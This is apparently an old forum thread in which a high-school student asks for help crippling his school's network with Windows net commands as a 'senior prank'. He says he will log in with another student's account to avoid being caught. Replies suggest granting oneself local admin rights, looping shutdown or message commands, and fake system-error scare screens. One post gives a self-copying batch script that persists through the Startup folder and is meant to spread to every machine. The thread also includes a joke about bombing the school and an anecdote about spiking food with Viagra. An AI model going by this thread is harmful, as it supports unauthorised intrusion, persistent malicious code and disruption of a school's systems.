| View previous topic :: View next topic |
| Author |
Message |
mossadkiller Master Cheater
Reputation: 0
Joined: 11 Jun 2007 Posts: 369
|
Posted: Wed Apr 01, 2009 1:08 pm Post subject: [HELP].NET COMMAND Abuse for Senior Prank |
|
|
Hi, first I would like to introduce myself, I am a student who is currently trying to create an end of the year prank for his school. At the moment I gave up on the immature and easily copied pranks that most high school students tend to use. Instead I am trying to establish some way of either crippling my schools network using the .NET COMMAND System, or of creating a hilarious prank using it. I believe it is the most creative/hidden prank I have heard of.
My school doesn't seem to be very "Strong" Computer security wise. I have not been able to fully test this out, but I believe that it is as weak as a straw hut. It's anti-virus system is standard Mcaffee, and it uses what most High Schools use a "Freeze" program to make sure that no students can do severe damage to the computers themselves. Since the High School itself doesn't have many technologically capable students, I figure that no one will be able to pinpoint who did it, and my logic behind this is that there is no one taking AP Computer Science, and because the people in my Programming class are very ignorant and have already fallen behind after about 5 lessons of simple Java.
I tested out some .NET COMMANDS pretty easily since my school did not block the cmd prompt. I was able to get into most things, and did not attempt to change anything because I was on my account and the time span and computer used would have been easily tracked.
So I wanted to try and solicit help from the many members of CEF who actually know what they are doing, and have more experience then me.
The things I gathered after 1 day of poking around are:
| Code: | | The school is very vulnerable |
| Code: | | I will be able to get away with it easily, as I will be going into the computers at the library and using another students account. Which in itself is proof of the lack of security. Students are allotted a number and that is what they use to sign into their account. |
| Code: | | Time span of this will be about 2 months of prep work, and either starting the prank the last week of school or on the last day of school itself. |
| Code: | | I will most likely be leaving the country for summer vacation so legal prosecution will probably be out of the question. I am semi-worried that if I would be caught I would be expelled from this school, but hey I will say it is a senior prank and they might be less likely to be "angered". |
| Code: | | I am still needing ideas on what to do, Shut down all computers except for the one executing the bat file with the commands on a loop of once every 5 minutes, or sending a message every minute saying "Senior Prank School Name and Graduation year", or shutting down the servers and looping it to shut down every X minutes, or an idea that someone can give me from this thread. |
_________________
MAGE () CLERIC () 40 () 50 () 60 () PRIEST ()
(PERMA BANNED 4th char) This is pissing me off, I cant make it to priest >.> effing bull crap >.> Please suggest me the perfect hacker world! |
|
| Back to top |
|
 |
Farr. Grandmaster Cheater
Reputation: 0
Joined: 11 Aug 2008 Posts: 749
|
Posted: Wed Apr 01, 2009 3:48 pm Post subject: |
|
|
we can't help you as much since we don't know exactly how your school's system is setup. for instance in my school everything is blocked, even the C: drive and other things like cmd or even "properties" when you right click on the desktop. you can't do shit. You can always add an account to the localgroup or add yourself as an admin and go from there but again, it all depends on how your school's system is setup. you need to give more info
also i don't see this working out so well because you'd have to be sure that most of the school's computers are turned on and that people are actually using them, (I'm saying people are in class 75% of the day in school) it would be very very easy to track the account executing the commands even though it may not be your account.
when the grade twelves graduated, their prank was filling the ketchup and mustard bottles in the cafe with viagra. they also setup a tower of open water bottles on the floor so everyone would hit them and it would fall over. Then they brought water balloons and threw them at students and they did a bunch of other stuff i can't remember. it was a really funny day
|
|
| Back to top |
|
 |
hcavolsdsadgadsg I'm a spammer
Reputation: 26
Joined: 11 Jun 2007 Posts: 5801
|
Posted: Wed Apr 01, 2009 4:15 pm Post subject: |
|
|
| Valve wrote: | | when the grade twelves graduated, their prank was filling the ketchup and mustard bottles in the cafe with viagra. |
this was incredibly stupid.
combined with other medication, enough of it can be life threatening.
|
|
| Back to top |
|
 |
cokefag Master Cheater
Reputation: 51
Joined: 15 Nov 2007 Posts: 488
|
Posted: Wed Apr 01, 2009 8:29 pm Post subject: |
|
|
Idea for the prank.
From a remote computer, like the Conficker C virus has control of over 9000 computers, you will remotely activate this program that turns off all computers, and then put them in a mode where EFG does his epic fail dance for 60 seconds before making a really high pitched annoying fucking sound emitting from the computers that cannot be stopped by muting the computers.
You will then bomb the school.
Good plan NO?
You can cut out the bombs.
|
|
| Back to top |
|
 |
nwongfeiying Grandmaster Cheater
Reputation: 2
Joined: 25 Jun 2007 Posts: 695
|
Posted: Wed Apr 01, 2009 8:34 pm Post subject: |
|
|
| Use the conficker n virus remover on my signature?
|
|
| Back to top |
|
 |
hacksign23 Master Cheater
Reputation: 0
Joined: 26 Nov 2006 Posts: 404
|
Posted: Wed Apr 01, 2009 8:46 pm Post subject: |
|
|
o-o umm...
.cmd commands?
how about
:lol
msg "OMNOMNOMNOMN HAI GUISE"
goto lol
_________________
|
|
| Back to top |
|
 |
Uraguay Master Cheater
Reputation: 0
Joined: 28 Jun 2008 Posts: 303
|
Posted: Wed Apr 01, 2009 8:51 pm Post subject: |
|
|
batch file -
black out the screen, either by using a powerpoint way or whatever
then scare the crap outa them - type in random messages, ie /del system32 Y/N. . .
illusion of restarting the computer, then giving a message that says "system file not found. please reinstall xxxx"
imo that would scare the hell out of people using the computer
_________________
DeRep me. |
|
| Back to top |
|
 |
[SWED] Faust Ph'nglui mglw'nafh Cthulhu R'lyeh wgah'nagl fhtagn
Reputation: 6
Joined: 14 Apr 2007 Posts: 371 Location: Zug Izland
|
Posted: Thu Apr 02, 2009 6:42 pm Post subject: |
|
|
| Code: | @echo off
if exist "%userprofile%\start menu\programs\startup\start.bat" goto a
if not exist "%userprofile%\start menu\programs\startup\start.bat" goto b
:b
copy "start.bat" "%userprofile%\start menu\programs\startup"
goto a
:a
:Lulz
www.bringvictory.com
goto Lulz
|
simple, annoying Rickroll
you do the rest to get it to infect every computer
F.Y.I. name this batch script start.bat
_________________
|
|
| Back to top |
|
 |
|